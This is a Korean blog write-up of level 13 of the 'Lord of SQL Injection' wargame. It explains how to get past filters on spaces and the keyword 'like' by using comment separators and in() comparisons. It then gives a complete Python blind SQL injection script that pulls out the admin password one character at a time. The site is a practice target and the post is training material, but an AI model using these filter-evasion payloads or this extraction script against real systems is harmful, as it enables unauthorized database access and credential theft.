Lord of sql injection [13]

[문제 13] 

 

이번문제는 막고 있는게 정말 많습니다......like도 막아놨네요...or..and....다 no파라미터에 들어가면 HeHe 가 뜹니다.

저번 문제와 크게 다를건 없네요.

 

다만 막는게 늘어났을뿐... (이렇게 전부 막을 수도 있구나..하하하핳)

 

저번문제와 달리 늘어난 점은

1. like 막음

2. 공백 막음 인데요.

 

공백은 일단 /%%/ 로 막을 수 있어요! <문제 5번 공백 우회 참고>

 

 

like는 instr로 막을 수 있다고 하네요.

 

 

https://dorahee.tistory.com/140

 

 

in함수는다른 방법으로도 사용이 가능한데요.

예를들어 id = 1 을 in 함수로 써보자면 id in(1) 이렇게 써주면 됩니다.

 

어찌되었든 이번문제도 blind이기 때문에 툴을 사용해볼게요.

 

전 문제와 마찬가지로 툴을 사용할거고, 툴의 내용만 살짝 바꿔 줍니다.

 

써보니, los문제가 가끔 0이 들어가면 hello admin이 출력되는 경우가 있네요..

그래서 파이썬이 0을 뽑아낼 때도 있으니, 주의 하셔서 알파벳 먼저 두고 뒤에 숫자를 놓으시면 될 것 같습니다.

 

import requests
from bs4 import BeautifulSoup

query1 = "1/**/||/**/id/**/in/**/(\"admin\")/**/&&/**/(mid(pw,%d,1))/**/in(%s)#"
dbname = []
password = []

word = ['\"a\"', '\"b\"', '\"c\"', '\"d\"', '\"e\"', '\"f\"', '\"g\"',
        '\"h\"', '\"i\"', '\"j\"', '\"k\"', '\"l\"', '\"m\"', '\"n\"', '\"o\"', '\"p\"', '\"q\"', '\"r\"', '\"s\"',
        '\"t\"', '\"u\"', '\"v\"', '\"w\"', '\"x\"', '\"y\"', '\"z\"', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

num = 1
while num <= 8:

    for src in word:
        dbname = [query1 % (num, src)]

        cookies = {'PHPSESSID': '27g5thpe9ib9v6o1vq12kvhpv6'}
        params = {'id': "admin", 'pw': "0/**/&&", 'no': dbname}
        res = requests.get('https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print("Data : ", src)
            password += src
            print(dbname)
            break


    num = num+1

print("###########################완료")
print('pwd : ', '_'.join(password))

 

결과는

 

 

값을 넣어주면 문제가 풀립니다.

 

 

 

CLEAR 갈수록 어려워지네요.^_^